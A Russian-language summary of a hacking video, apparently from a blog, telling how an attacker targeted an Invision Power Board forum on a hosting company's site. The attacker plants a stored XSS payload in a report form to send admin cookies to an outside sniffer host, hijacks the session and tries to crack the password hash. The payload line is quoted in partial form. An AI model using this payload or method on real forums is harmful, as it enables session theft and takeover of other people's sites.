В этом видео-взломе, хакер демонстрирует новую уязвимость в популярном
форумном движке Invision Power Board.

Вначале он задействует Яндекс для целенаправленного поиска русского хостинга
с установленным IPB. Герой делает следующий запрос: "Форум Invision Power Board
Платный хостинг от .ru". Вторая ссылка выданная поисковиком, вела на форум
компании Viahost. Взломщик был предусмотрительным и заранее зарегистрировался на
форуме =). Хакер выбирает рандомное сообщение и жмет на кнопку жалобы. Что бы не
вызвать подозрений у администрации, герой пишет правдоподобное сообщение и
попутно вставляет java-скрипт крадущий админские кукисы на сторонний сервер. Сам
воровской скрипт выглядит примерно так: <_script_>img = new Image(); img.src = "http://antichat.org/s/mysniff.gif?"+document.c...t;_/script_>.
Через какое-то время, мерзкий негодяй заходит и смотрит в лог своего сниффера,
обнаруживает там идентификатор, сессию и хэш пароля администратора похаканной
борды. Теперь дело за малым - осталось лишь подменить свои кукисы админскими.
Для этих целей взломщик использует плагин для браузера Mozzila, под названием,
как ни странно, "Cookie Editor". Обновив страницу, герой понимает что теперь он
- админ с ником "Support" Smile. Но ему и этого мало и чел пытается расшифровать
хэш, для входа в админку. Брут по нескольким словарям не увенчался успехом,
значит хостинг в этот раз отделался легким испугом, т.к. если бы хакер завладел
паролем (в админцентр без пропуска нельзя Wink, то далее можно залить веб-шелл,
а потом и порулить всей машиной (даже не имея водительских прав =)

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии